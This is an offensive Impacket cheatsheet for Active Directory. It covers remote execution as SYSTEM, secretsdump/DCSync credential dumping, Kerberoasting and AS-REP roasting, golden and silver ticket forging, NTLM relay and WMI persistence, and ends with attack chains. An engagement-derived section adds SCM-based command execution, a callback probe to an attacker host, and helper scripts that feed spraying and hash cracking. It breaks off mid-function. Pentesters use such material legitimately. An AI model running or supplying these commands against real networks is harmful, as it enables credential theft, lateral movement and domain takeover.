
Impacket Suite Cheatsheet

Installation

Using pip

pip install impacket

From GitHub (latest)

git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

Using pipx

pipx install impacket

Authentication Methods

Password Authentication

impacket-tool $domain/$username:$password@$target

NTLM Hash Authentication

impacket-tool $domain/$username@$target -hashes :$ntlm_hash
impacket-tool $domain/$username@$target -hashes $lm_hash:$ntlm_hash

Kerberos Authentication

export KRB5CCNAME=$ticket.ccache
impacket-tool $domain/$username@$target -k -no-pass

AES Key Authentication

impacket-tool $domain/$username@$target -aesKey $aes_key

Remote Execution

psexec.py - Remote Command Execution

# With password
impacket-psexec $domain/$username:$password@$target

# With hash
impacket-psexec $domain/$username@$target -hashes :$ntlm_hash

# Execute specific command
impacket-psexec $domain/$username:$password@$target "whoami"

# With custom service name (default is a random 4-letter name)
impacket-psexec $domain/$username:$password@$target -service-name LUALL

# With custom name for the service binary uploaded to ADMIN$ (default is a random name)
impacket-psexec $domain/$username:$password@$target -remote-binary-name svchost_upd.exe

smbexec.py - SMB-based Command Execution

# Basic usage
impacket-smbexec $domain/$username:$password@$target

# With hash
impacket-smbexec $domain/$username@$target -hashes :$ntlm_hash

# With specific share
impacket-smbexec $domain/$username:$password@$target -share ADMIN$

# Output mode: SHARE (default) writes command output to a share on the target (-share, default C$);
# SERVER serves the output share from a local SMB server instead (needs root locally)
impacket-smbexec $domain/$username:$password@$target -mode SERVER

wmiexec.py - WMI-based Command Execution

# Basic usage
impacket-wmiexec $domain/$username:$password@$target

# With hash
impacket-wmiexec $domain/$username@$target -hashes :$ntlm_hash

# Run a single command (no interactive shell)
impacket-wmiexec $domain/$username:$password@$target "systeminfo"

# Fire and forget: no output file is written and no SMB connection is made for retrieval
impacket-wmiexec $domain/$username:$password@$target -nooutput "cmd /c start notepad"

# Debug mode
impacket-wmiexec $domain/$username:$password@$target -debug

atexec.py - Task Scheduler Execution

# Execute command via Task Scheduler
impacket-atexec $domain/$username:$password@$target "whoami"

# With hash
impacket-atexec $domain/$username@$target -hashes :$ntlm_hash "systeminfo"

dcomexec.py - DCOM-based Execution

# Using MMC20 method (default)
impacket-dcomexec -object MMC20 $domain/$username:$password@$target 'powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==' -silentcommand


# Using ShellWindows method
impacket-dcomexec $domain/$username:$password@$target -object ShellWindows

# Using ShellBrowserWindow method
impacket-dcomexec $domain/$username:$password@$target -object ShellBrowserWindow

# With hash
impacket-dcomexec $domain/$username@$target -hashes :$ntlm_hash

Credential Dumping

secretsdump.py - Dump Credentials

# Dump all secrets from DC
impacket-secretsdump $domain/$username:$password@$dc_ip

# Dump NTDS.dit (DCSync)
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc

# Dump specific user via DCSync
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc-user krbtgt

# Dump NTDS with history
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc -history

# Copy NTDS.dit through a shadow copy instead of DRSUAPI replication (needs admin on the DC, noisier)
impacket-secretsdump $domain/$username:$password@$dc_ip -use-vss

# From local SAM and SYSTEM files
impacket-secretsdump -sam $sam_file -system $system_file LOCAL

# From NTDS.dit file
impacket-secretsdump -ntds $ntds_file -system $system_file LOCAL

# Output to file
impacket-secretsdump $domain/$username:$password@$dc_ip -outputfile credentials

# NTDS NTLM hashes only (skip Kerberos keys; faster DCSync)
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc-ntlm

# With Kerberos
export KRB5CCNAME=$ticket.ccache
impacket-secretsdump $domain/$username@$dc_ip -k -no-pass

mimikatz.py - Mimikatz RPC Client

mimikatz.py does not upload or run mimikatz; it is a client for the RPC server that an already-running mimikatz instance exposes on the target (rpc::server). Get mimikatz running there first (psexec/wmiexec), then connect.

# Connect to the mimikatz RPC server on the target
impacket-mimikatz $domain/$username:$password@$target

# With specific command
impacket-mimikatz $domain/$username:$password@$target -c "lsadump::sam"

reg.py - Remote Registry Operations

# Query registry key
impacket-reg $domain/$username:$password@$target query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key
impacket-reg $domain/$username:$password@$target add -keyName HKLM\\SOFTWARE\\Test

# Delete registry key
impacket-reg $domain/$username:$password@$target delete -keyName HKLM\\SOFTWARE\\Test

# Save hive
impacket-reg $domain/$username:$password@$target save -keyName HKLM\\SAM

SMB Operations

smbclient.py - SMB Client

# Interactive mini shell (commands: shares, use <share>, ls, cd, get, put, info, exit)
impacket-smbclient $domain/$username:$password@$target

# With hash
impacket-smbclient $domain/$username@$target -hashes :$ntlm_hash

# Run mini-shell commands from a local file, one per line (e.g. "use C$" then "ls")
impacket-smbclient $domain/$username:$password@$target -file $commands.txt

smbserver.py - SMB Server

# Start SMB server
impacket-smbserver share_name /path/to/share

# With authentication
impacket-smbserver share_name /path/to/share -username $user -password $pass

# SMB2 support (required for current Windows clients, which have SMB1 disabled)
impacket-smbserver share_name /path/to/share -smb2support

# With specific IP
impacket-smbserver share_name /path/to/share -ip $listen_ip

# Debug mode
impacket-smbserver share_name /path/to/share -debug

# With comment
impacket-smbserver share_name /path/to/share -comment "Test Share"

smbpasswd.py - Change SMB Password

# Change password
impacket-smbpasswd $domain/$username:$oldpassword@$target -newpass $newpassword

# With hash
impacket-smbpasswd $domain/$username@$target -hashes :$ntlm_hash -newpass $newpassword

Kerberos Attacks

GetTGT.py - Request TGT

# Request TGT with password
impacket-getTGT $domain/$username:$password

# Request TGT with hash
impacket-getTGT $domain/$username -hashes :$ntlm_hash

# Request TGT with AES key
impacket-getTGT $domain/$username -aesKey $aes_key

# With domain controller IP
impacket-getTGT $domain/$username:$password -dc-ip $dc_ip

# The ticket is written as $username.ccache in the current directory (getTGT has no output-file option); point impacket at it
export KRB5CCNAME=$username.ccache

GetST.py - Request Service Ticket

# Request service ticket with TGT
export KRB5CCNAME=$username.ccache
impacket-getST -k -no-pass -spn cifs/$target.$domain $domain/$username

# With password
impacket-getST -spn cifs/$target.$domain $domain/$username:$password

# Impersonate user (S4U)
impacket-getST -spn cifs/$target.$domain -impersonate Administrator $domain/$service_account:$password

# The ticket is saved in the current directory as <user>@<spn with / replaced by _>@<REALM>.ccache (no output-file option; use the name getST prints)
impacket-getST -spn cifs/$target.$domain $domain/$username:$password

GetNPUsers.py - ASREPRoasting

# Unauthenticated: try a list of usernames (no domain credentials needed)
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -dc-ip $dc_ip

# Unauthenticated: single user
impacket-GetNPUsers $domain/$target_user -no-pass -dc-ip $dc_ip

# Authenticated: query LDAP for accounts with DONT_REQ_PREAUTH and request their AS-REPs
impacket-GetNPUsers $domain/$username:$password -request -dc-ip $dc_ip

# Output in John format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format john -dc-ip $dc_ip -outputfile $hashes.txt

# Output in Hashcat format (the default)
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format hashcat -dc-ip $dc_ip -outputfile $hashes.txt

GetUserSPNs.py - Kerberoasting

# Get SPNs and TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request

# With hash
impacket-GetUserSPNs $domain/$username -hashes :$ntlm_hash -request

# Save hashes to a file (the $krb5tgs$... lines are accepted as-is by both hashcat and John)
impacket-GetUserSPNs $domain/$username:$password -request -outputfile $hashes.txt

# Target specific SPN
impacket-GetUserSPNs $domain/$username:$password -request-user $service_account

# With DC IP
impacket-GetUserSPNs $domain/$username:$password -request -dc-ip $dc_ip

ticketer.py - Golden/Silver Ticket Creation

# Create Golden Ticket
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# Create Silver Ticket
impacket-ticketer -nthash $service_hash -domain-sid $domain_sid -domain $domain -spn cifs/$target.$domain Administrator

# With specific user ID
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -user-id 500 Administrator

# With groups
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -groups 512,513,519 Administrator

# With duration
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -duration 365 Administrator

# With AES key
impacket-ticketer -aesKey $aes_key -domain-sid $domain_sid -domain $domain Administrator

ticketConverter.py - Convert Ticket Formats

# Convert kirbi to ccache
impacket-ticketConverter $ticket.kirbi $ticket.ccache

# Convert ccache to kirbi
impacket-ticketConverter $ticket.ccache $ticket.kirbi

LDAP Operations

ldapdomaindump - Dump LDAP Information

ldapdomaindump is a separate tool (dirkjanm/ldapdomaindump), not part of impacket: the host is positional and credentials go in -u/-p.

# Dump all LDAP info (writes HTML, JSON and grep-friendly files to the current directory)
ldapdomaindump -u "$domain\\$username" -p "$password" $dc_ip

# With hash (-p also accepts LM:NTLM)
ldapdomaindump -u "$domain\\$username" -p "$lm_hash:$ntlm_hash" $dc_ip

# Output to specific directory
ldapdomaindump -u "$domain\\$username" -p "$password" -o /tmp/ldap_dump $dc_ip

# Skip JSON output
ldapdomaindump -u "$domain\\$username" -p "$password" --no-json $dc_ip

# Skip grep-friendly output
ldapdomaindump -u "$domain\\$username" -p "$password" --no-grep $dc_ip

GetADUsers.py - Enumerate AD Users

# Get all users
impacket-GetADUsers $domain/$username:$password

# Include disabled accounts and accounts without an email address
impacket-GetADUsers $domain/$username:$password -all

# With DC IP
impacket-GetADUsers $domain/$username:$password -dc-ip $dc_ip

# Debug mode
impacket-GetADUsers $domain/$username:$password -debug

Network Protocols

ntlmrelayx.py - NTLM Relay

# Basic relay to target (relaying to SMB only works where the target does not require SMB signing;
# DCs require it by default, member servers and workstations usually do not)
impacket-ntlmrelayx -t smb://$target -smb2support

# With command execution
impacket-ntlmrelayx -t smb://$target -c "whoami"

# Relay to multiple targets
impacket-ntlmrelayx -tf $targets.txt

# With socks proxy
impacket-ntlmrelayx -t smb://$target -socks

# Default SMB action when neither -c nor -e is given: dump the target's SAM via secretsdump
impacket-ntlmrelayx -t smb://$target

# Interactive shell
impacket-ntlmrelayx -t smb://$target -i

# Specific SMB2 support
impacket-ntlmrelayx -t smb://$target -smb2support

# Relay to LDAPS for shadow credentials. Needs an HTTP-origin authentication (WebDAV coercion, WPAD/mitm6):
# SMB clients negotiate signing and the NTLM MIC stops that flag being stripped, so SMB->LDAP(S) relay fails on patched hosts
impacket-ntlmrelayx -t ldaps://$dc_ip --shadow-credentials --shadow-target $target$

# Relay to LDAPS for RBCD (same origin constraint)
impacket-ntlmrelayx -t ldaps://$dc_ip --delegate-access

# Enumerate local admins on each target (no exec)
impacket-ntlmrelayx -tf $targets.txt --enum-local-admins

# Serve a WPAD file that points at the attacker (pair with mitm6 / IPv6 DNS takeover) and relay the resulting HTTP auth
impacket-ntlmrelayx -t ldaps://$dc_ip -wh $attacker_ip -6

Responder (separate tool, not part of impacket)

# Poison LLMNR/NBT-NS/mDNS and run the rogue servers (-w WPAD, -d DHCP, -P force proxy auth)
responder -I eth0 -wdP

# Analyze mode (listen only, no poisoning; safe for scoping)
responder -I eth0 -A

# Force NTLM authentication on WPAD requests
responder -I eth0 -w -F

MS-RPC Operations

rpcdump.py - Enumerate RPC Endpoints

# Enumerate RPC endpoints
impacket-rpcdump $domain/$username:$password@$target

# With specific port
impacket-rpcdump $domain/$username:$password@$target -port 445

# With hash
impacket-rpcdump $domain/$username@$target -hashes :$ntlm_hash

samrdump.py - SAM Remote Dump

# Enumerate users via SAM-R
impacket-samrdump $domain/$username:$password@$target

# With specific port
impacket-samrdump $domain/$username:$password@$target -port 445

# With hash
impacket-samrdump $domain/$username@$target -hashes :$ntlm_hash

lookupsid.py - SID Bruteforce

# Enumerate users and groups by brute-forcing RIDs over LSARPC (default maximum RID 4000)
impacket-lookupsid $domain/$username:$password@$target

# With a higher maximum RID (positional argument, not a flag)
impacket-lookupsid $domain/$username:$password@$target 20000

# With hash
impacket-lookupsid $domain/$username@$target -hashes :$ntlm_hash

# Print full SIDs (domain SID + RID) instead of bare RIDs
impacket-lookupsid $domain/$username:$password@$target -domain-sids
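Turning lookupsid output into input for the next tool, as an added example (not impacket code): the functions below keep only SidTypeUser entries, strip the RID and DOMAIN\ prefix, drop machine accounts, and pull the domain SID for ticketer -domain-sid, so the result can go straight into GetNPUsers -usersfile or a password spray. LOOKUPSID_SAMPLE is a constructed transcript, not output from a real host.

```shell
# Constructed sample of impacket-lookupsid output (not captured from a real host).
LOOKUPSID_SAMPLE='[*] Brute forcing SIDs at 10.0.0.5
[*] StringBinding ncacn_np:10.0.0.5[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1111111111-2222222222-3333333333
498: CORP\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CORP\Administrator (SidTypeUser)
501: CORP\Guest (SidTypeUser)
502: CORP\krbtgt (SidTypeUser)
512: CORP\Domain Admins (SidTypeGroup)
1000: CORP\DC01$ (SidTypeUser)
1105: CORP\svc_sql (SidTypeUser)
1106: CORP\j.doe (SidTypeUser)
1107: CORP\Finance (SidTypeAlias)'

# Print user accounts only, one sAMAccountName per line, for GetNPUsers -usersfile or a spray.
# Machine accounts (trailing $) are dropped: they never have pre-auth disabled and only add noise.
lookupsid_users() {
  awk '/\(SidTypeUser\)$/ {
    sub(/^[0-9]+: /, "")          # drop "RID: "
    sub(/ \(SidTypeUser\)$/, "")  # drop the type suffix
    sub(/^[^\\]*\\/, "")          # drop "DOMAIN\"
    if ($0 !~ /\$$/) print
  }'
}

# Extract the domain SID (needed for ticketer -domain-sid).
lookupsid_domain_sid() {
  awk '/Domain SID is:/ { print $NF; exit }'
}

# Usage against the embedded sample; with the real tool:
#   impacket-lookupsid "$domain/$username:$password@$target" | lookupsid_users > users.txt
printf '%s\n' "$LOOKUPSID_SAMPLE" | lookupsid_users
printf '%s\n' "$LOOKUPSID_SAMPLE" | lookupsid_domain_sid
```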

rpcmap.py - RPC Endpoint Mapper

# Map RPC interfaces through the endpoint mapper (port 135); double quotes so $target expands
impacket-rpcmap "ncacn_ip_tcp:$target[135]"

# With authentication
impacket-rpcmap "ncacn_ip_tcp:$target" -auth-type 1 -username $username -password $password

# Without an explicit port the string binding is used as given
impacket-rpcmap "ncacn_ip_tcp:$target"

Database Attacks

mssqlclient.py - MSSQL Client

# Connect with SQL authentication and drop into the SQL> shell
impacket-mssqlclient $domain/$username:$password@$target

# With Windows (domain) authentication
impacket-mssqlclient $domain/$username:$password@$target -windows-auth

# Run commands from a file, one per line (the shell's built-ins work here too)
impacket-mssqlclient $domain/$username:$password@$target -file $commands.sql

# With specific database
impacket-mssqlclient $domain/$username:$password@$target -db $database

# With hash (Windows auth only)
impacket-mssqlclient $domain/$username@$target -windows-auth -hashes :$ntlm_hash

# OS command execution is done from the SQL> shell with its built-ins, not with a flag:
#   SQL> enable_xp_cmdshell
#   SQL> xp_cmdshell whoami
#   SQL> disable_xp_cmdshell

WMI Operations

wmiquery.py - WMI Queries

# Interactive WQL shell (type queries such as SELECT * FROM Win32_OperatingSystem)
impacket-wmiquery $domain/$username:$password@$target

# With specific namespace (default //./root/cimv2)
impacket-wmiquery $domain/$username:$password@$target -namespace //./root/cimv2

# Run queries from a file, one per line
impacket-wmiquery $domain/$username:$password@$target -file $queries.wql

# With hash
impacket-wmiquery $domain/$username@$target -hashes :$ntlm_hash

wmipersist.py - WMI Persistence

# Install a permanent event subscription that runs a VBScript (ActiveScriptEventConsumer) on a timer (ms)
impacket-wmipersist $domain/$username:$password@$target install -name TestEvent -vbs $payload.vbs -timer 60000

# Trigger on a WQL event filter instead of a timer
impacket-wmipersist $domain/$username:$password@$target install -name TestEvent -vbs $payload.vbs -filter "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LogonSession'"

# Remove persistence
impacket-wmipersist $domain/$username:$password@$target remove -name TestEvent

# With hash
impacket-wmipersist $domain/$username@$target -hashes :$ntlm_hash install -name TestEvent -vbs $payload.vbs -timer 60000

Other Useful Tools

addcomputer.py - Add Computer Account

# Add computer account (SAMR over SMB by default; a plain user needs ms-DS-MachineAccountQuota > 0, default 10)
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password

# With specific DC
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password -dc-ip $dc_ip

# With hash
impacket-addcomputer $domain/$username -hashes :$ntlm_hash -computer-name $computer$ -computer-pass $computer_password

# Delete computer
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -delete

exchanger.py - Exchange NSPI Address Book Enumeration

# Query the Exchange address book over MAPI/NSPI (subcommands: list-tables, dump-tables, guid-known, dnt-lookup)
impacket-exchanger $domain/$username:$password@$exchange_server -rpc-hostname $exchange_name nspi list-tables

findDelegation.py - Find Delegation

# Find delegation opportunities
impacket-findDelegation $domain/$username:$password

# With specific DC
impacket-findDelegation $domain/$username:$password -dc-ip $dc_ip

# With hash
impacket-findDelegation $domain/$username -hashes :$ntlm_hash

Get-GPPPassword.py - Extract GPP Passwords

# Extract GPP passwords
impacket-Get-GPPPassword $domain/$username:$password@$target

# With hash
impacket-Get-GPPPassword $domain/$username@$target -hashes :$ntlm_hash

# From local file
impacket-Get-GPPPassword -xmlfile $groups.xml

mqtt_check.py - MQTT Check

# Check MQTT service anonymously (target format is [[domain/]username[:password]@]host)
impacket-mqtt_check $target

# With credentials
impacket-mqtt_check $username:$password@$target

rdp_check.py - RDP Check

# Check RDP
impacket-rdp_check $domain/$username:$password@$target

# With hash
impacket-rdp_check $domain/$username@$target -hashes :$ntlm_hash

services.py - Service Operations

# List services
impacket-services $domain/$username:$password@$target list

# Start service
impacket-services $domain/$username:$password@$target start -name $service_name

# Stop service
impacket-services $domain/$username:$password@$target stop -name $service_name

# Create service
impacket-services $domain/$username:$password@$target create -name $service_name -display $display_name -path $binary_path

# Delete service
impacket-services $domain/$username:$password@$target delete -name $service_name

# Change service config
impacket-services $domain/$username:$password@$target change -name $service_name -start-type auto

netview.py - Session Enumeration

# Get the server list from the domain and poll each host's logged-on sessions (loops until Ctrl-C)
impacket-netview $domain/$username:$password

# Only report sessions for the users in a file (one per line)
impacket-netview $domain/$username:$password -users $users.txt

# Only report sessions for a single user
impacket-netview $domain/$username:$password -user $target_user

# Poll a specific target list instead of the domain's server list; -noloop for a single pass
impacket-netview $domain/$username:$password -targets $targets.txt -noloop

Useful Attack Chains

Pass-the-Hash Attack Chain

# 1. Dump hashes
impacket-secretsdump $domain/$username:$password@$target -outputfile hashes

# 2. Use hash for authentication
impacket-wmiexec $domain/Administrator@$target -hashes :$admin_hash

# 3. Dump more credentials
impacket-secretsdump $domain/Administrator@$dc_ip -hashes :$admin_hash -just-dc

Kerberoasting Attack Chain

# 1. Find SPNs
impacket-GetUserSPNs $domain/$username:$password

# 2. Request TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request -outputfile hashes.txt

# 3. Crack offline with hashcat (13100 = RC4 etype 23; AES tickets need 19600 for etype 17, 19700 for etype 18)
hashcat -m 13100 hashes.txt wordlist.txt
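Picking the hashcat mode, as an added example (not from the page, impacket or hashcat): a fixed 13100 only fits RC4 (etype 23) tickets; accounts with AES-only keys come back as $krb5tgs$17$ / $krb5tgs$18$ and AS-REP roast output as $krb5asrep$23$, each needing a different mode. The functions below read the etype from the hash prefix and split a mixed GetUserSPNs/GetNPUsers file into one file per mode, printing the matching hashcat command for each. The KRB_SAMPLE lines are constructed and abbreviated, not real tickets.

```shell
# Constructed, abbreviated hash lines in the layouts GetUserSPNs/GetNPUsers write (not real tickets).
KRB_SAMPLE='$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$0a1b2c3d$9f8e7d6c
$krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$a1b2c3d4$e5f6a7b8
$krb5asrep$23$j.doe@CORP.LOCAL:1234abcd$5678ef90'

# hashcat mode from the hash prefix: the etype is the number after $krb5tgs$ / $krb5asrep$.
krb_hashcat_mode() {  # $1 = one hash line
  case "$1" in
    '$krb5tgs$23$'*)   echo 13100 ;;  # Kerberoast, RC4-HMAC (etype 23)
    '$krb5tgs$17$'*)   echo 19600 ;;  # Kerberoast, AES128-CTS (etype 17)
    '$krb5tgs$18$'*)   echo 19700 ;;  # Kerberoast, AES256-CTS (etype 18)
    '$krb5asrep$23$'*) echo 18200 ;;  # AS-REP roast, RC4-HMAC (etype 23)
    *) echo "unrecognised hash line" >&2; return 1 ;;
  esac
}

# Split a mixed hash file into one file per mode under $2 and print the hashcat command for each.
krb_split_by_mode() {  # $1 = mixed hash file, $2 = output directory
  mkdir -p "$2"
  while IFS= read -r line || [ -n "$line" ]; do
    if [ -n "$line" ]; then
      if mode=$(krb_hashcat_mode "$line"); then
        printf '%s\n' "$line" >> "$2/$mode.txt"
      fi
    fi
  done < "$1"
  for f in "$2"/*.txt; do
    [ -e "$f" ] || continue
    echo "hashcat -m $(basename "$f" .txt) $f wordlist.txt"
  done
}

# Usage: krb_split_by_mode hashes.txt ./cracking
# Per-line check against the embedded sample (prints 13100, 19700, 18200):
printf '%s\n' "$KRB_SAMPLE" | while IFS= read -r l; do krb_hashcat_mode "$l"; done
```

Lines that match no prefix are reported on stderr and skipped rather than silently dropped into the wrong mode, which is the usual cause of a "no hashes loaded" run.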

DCSync Attack Chain

# 1. Get domain admin privileges (various methods)
# 2. Perform DCSync
impacket-secretsdump $domain/$da_user:$da_password@$dc_ip -just-dc

# 3. Create golden ticket with krbtgt hash
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# 4. Use ticket
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec $domain/Administrator@$target -k -no-pass

NTLM Relay Attack Chain

# Terminal 1: Start relay
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# Terminal 2: Trigger authentication (various methods)
# Could use Responder, mitm6, PrinterBug, PetitPotam, etc.

# Terminal 3: use the SOCKS proxy (proxychains.conf must point at 127.0.0.1:1080, ntlmrelayx's default listener).
# The relayed session supplies the authentication, so pass -no-pass and the same user@target ntlmrelayx lists under "socks"
proxychains impacket-secretsdump $domain/$username@$target -no-pass

Important Notes

Common Variables:

  • $domain = Domain name (e.g., corp.local)
  • $username = Username
  • $password = Password
  • $target = Target IP or hostname
  • $dc_ip = Domain Controller IP
  • $ntlm_hash = NTLM hash (32 hex characters)
  • $lm_hash = LM hash (32 hex characters)
  • $krbtgt_hash = krbtgt NTLM hash
  • $domain_sid = Domain SID (e.g., S-1-5-21-...)
  • $ticket.ccache = Kerberos ticket file

How impacket picks credentials:

  • -k: use Kerberos. If KRB5CCNAME points at a ccache holding a matching TGT/TGS, that ticket is used; otherwise a TGT is requested with the password, -hashes or -aesKey given.
  • Without -k: NTLM with the password or -hashes (the LM half may be left empty, i.e. -hashes :NT).
  • -no-pass: never prompt for a password (pair with -k when the ccache is the only credential).
  • -aesKey: Kerberos key authentication; implies Kerberos even without -k.

Output Files:

  • secretsdump -outputfile <prefix>: <prefix>.sam, <prefix>.secrets, <prefix>.cached, <prefix>.ntds, <prefix>.ntds.kerberos (AES keys), <prefix>.ntds.cleartext (reversible-encryption passwords)
  • GetUserSPNs -outputfile <file>: one $krb5tgs$... line per SPN
  • GetNPUsers -outputfile <file>: one $krb5asrep$... line per user
  • getTGT and ticketer: <user>.ccache in the current directory; getST: <user>@<spn with / replaced by _>@<REALM>.ccache

Environment Variables:

# For Kerberos authentication
export KRB5CCNAME=ticket.ccache

# proxychains reads no environment variable: point /etc/proxychains.conf (or proxychains4.conf) at the ntlmrelayx listener
#   socks4 127.0.0.1 1080

Tips:

  • Most tools support -debug flag for verbose output
  • Use -codec to specify encoding (useful for non-ASCII characters)
  • Many tools support -k -no-pass for Kerberos auth
  • Tools typically use port 445 (SMB) or 135 (RPC) by default
  • Add -ts for timestamps in output

Common Ports:

  • 88: Kerberos
  • 135: MS-RPC
  • 139: NetBIOS
  • 389: LDAP
  • 445: SMB
  • 464: Kerberos Password Change
  • 636: LDAPS
  • 1433: MSSQL
  • 3268: Global Catalog
  • 3389: RDP
  • 5985: WinRM HTTP
  • 5986: WinRM HTTPS

Impacket Remote Execution & DCSync — Cheatsheet

Purpose: Get SYSTEM code-exec and dump secrets over Kerberos with impacket — and know which exec channel survives when admin shares (ADMIN$/C$) are disabled. Distilled from a real internal AD test where SCM-over-IPC$ was the only exec channel and DCSync was attempted against the wrong host class.

Prereqs / context: Linux operator box, domain-joined, working from a Kerberos ccache (no plaintext, no cracking). Pinned build: impacket v0.14.0.dev0+... (the services.py SCM behaviour below matches 0.12→0.14). All identity comes from KRB5CCNAME; every tool is -k -no-pass. Target in the run was a member server (Oracle DB box) with MDE + Rapid7 + admin shares OFF; SCM/RPC over IPC$ was open.


0. Kerberos prep (identity for every command below)

kinit -k 'HOST/<ATTACKER_HOST>.<DOMAIN>@<REALM>'                                  # TGT for your own machine acct from /etc/krb5.keytab
export KRB5CCNAME=/path/to/<PRINCIPAL>@<spn>_<TARGET>@<REALM>.ccache              # point impacket at the S4U/PKINIT ticket you minted
klist                                                                             # sanity: confirm the cifs/<TARGET> TGS is cached before exec
# how the SYSTEM ticket was obtained (context, not the focus): S4U2self from a controlled machine acct onto its own cifs SPN
getST.py -self -impersonate '<SVC>@<DOMAIN>' -altservice 'cifs/<TARGET_FQDN>' -k -no-pass -dc-ip <DC_IP> '<DOMAIN>/<TARGET>$'   # impersonate a NON-protected local admin then cifs/<TARGET>
export KRB5CCNAME=$(ls -t '<SVC>@cifs_<TARGET_FQDN>@<REALM>.ccache')              # use the exact filename getST prints

Impersonating a Tier-0/Protected-Users account here fails KRB_AP_ERR_MODIFIED — pick a non-protected service account that holds local admin.


1. services.py — SCM over IPC$ (the channel that worked)

services.py drives the Service Control Manager over the \PIPE\svcctl named pipe on IPC$. It needs no writable admin share — that is why it survived when psexec/smbexec died on STATUS_BAD_NETWORK_NAME. Identity is taken from the ccache; pass only the target.

services.py -k -no-pass <TARGET_FQDN> list                                        # enumerate all services over SCM/IPC$ — proves SCM access (read)
services.py -k -no-pass <TARGET_FQDN> status -name <SVC_NAME>                      # query one service's state
services.py -k -no-pass <TARGET_FQDN> config -name <SVC_NAME>                      # read binPath/start type of a service
# create then start an arbitrary service whose binPath is your command (runs as LocalSystem)
services.py -k -no-pass <TARGET_FQDN> create -name HealthChk -display "Health Check" -path "C:\Windows\System32\cmd.exe /c <YOUR_COMMAND>"   # SCM stores arbitrary binPath
services.py -k -no-pass <TARGET_FQDN> start  -name HealthChk                       # SCM launches binPath as NT AUTHORITY\SYSTEM
services.py -k -no-pass <TARGET_FQDN> stop   -name HealthChk                       # stop (often N/A for non-service binaries)
services.py -k -no-pass <TARGET_FQDN> delete -name HealthChk                       # ALWAYS delete what you created

A cmd /c binPath is not a real service control process, so start will not get a "service started" reply — it returns 0x41d ERROR_SERVICE_REQUEST_TIMEOUT or sits in START_PENDING. Your command already ran. Use full paths in binPath (C:\Windows\System32\cmd.exe, not bare cmd) or you get 0x3 ERROR_PATH_NOT_FOUND.


2. Blind-SYSTEM proof (no output channel, no egress)

When admin shares are off (no output retrieval) and egress is unproven, prove exec with on-box markers — a command of yours that mutates state you can re-read over the SCM channel.

# A) marker-service trick: your service-launched command CREATES a second, named "proof" service as SYSTEM
services.py -k -no-pass <TARGET_FQDN> create -name ProofTest -display "Proof" -path "C:\Windows\System32\cmd.exe /c sc create ProofMarker binPath= C:\Windows\System32\cmd.exe"   # nested sc create runs as SYSTEM
services.py -k -no-pass <TARGET_FQDN> start  -name ProofTest                       # fire it (will time out — fine)
services.py -k -no-pass <TARGET_FQDN> list | grep -i ProofMarker                   # marker EXISTS then your command ran as LocalSystem. Proof.
# B) START_PENDING as a weaker proof: SCM accepted the start and launched the binary (binary executed even if it never signals back)
services.py -k -no-pass <TARGET_FQDN> create -name EgChk -display "EgChk" -path "C:\Windows\System32\cmd.exe /c dir \\<ATTACKER_IP>\pub"   # benign reach test
services.py -k -no-pass <TARGET_FQDN> start  -name EgChk                           # reaching START_PENDING = binary launched (a hang here = the command itself is blocking, e.g. egress filtered)
services.py -k -no-pass <TARGET_FQDN> status -name EgChk                           # STOPPED (ran+exited) vs START_PENDING (launched, hanging) tells delivery vs egress apart

In the real run: marker service confirmed present in list and a probe hit START_PENDING = two independent proofs of LocalSystem exec on a host with no output channel. (Caveat learned: a START_PENDING hang is an SCM start-timeout signal, not by itself proof of "egress blocked" — separate the two: marker = exec, callback = egress.)
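Sections 1 and 2 as one scripted round trip (create, start, confirm via a marker, delete) so nothing is left behind even when the run is interrupted. This is an added example, not impacket code and not the page's own script; it assumes services.py is on PATH and that KRB5CCNAME already holds the cifs/<TARGET> ticket. All SCM traffic goes through the svc function so the logic can be dry-run by overriding it with a stub. The START_PENDING/STOPPED tokens that svc_status_class greps for are the states the run above reports; that services.py status prints them verbatim is an assumption.

```shell
SVC_TARGET=${SVC_TARGET:-TARGET_FQDN}   # set before use; identity comes from KRB5CCNAME

# Every SCM call goes through here; redefine svc() with a stub to dry-run the logic.
svc() { services.py -k -no-pass "$SVC_TARGET" "$@"; }

# create + start + delete a service whose binPath is cmd.exe /c <command>. start is expected
# to fail with 0x41d ERROR_SERVICE_REQUEST_TIMEOUT for a cmd /c payload (the command has already
# run as LocalSystem by then), so its status is ignored; delete always runs.
svc_run_as_system() {  # $1 = service name, $2 = command line for cmd /c
  svc create -name "$1" -display "$1" -path "C:\\Windows\\System32\\cmd.exe /c $2" || return 1
  svc start -name "$1" || true
  svc delete -name "$1"
}

# Blind proof of SYSTEM exec: the payload itself creates a marker service; if the marker shows
# up in list afterwards, the payload ran as LocalSystem. Both services are removed again.
svc_prove_system_exec() {  # $1 = marker service name
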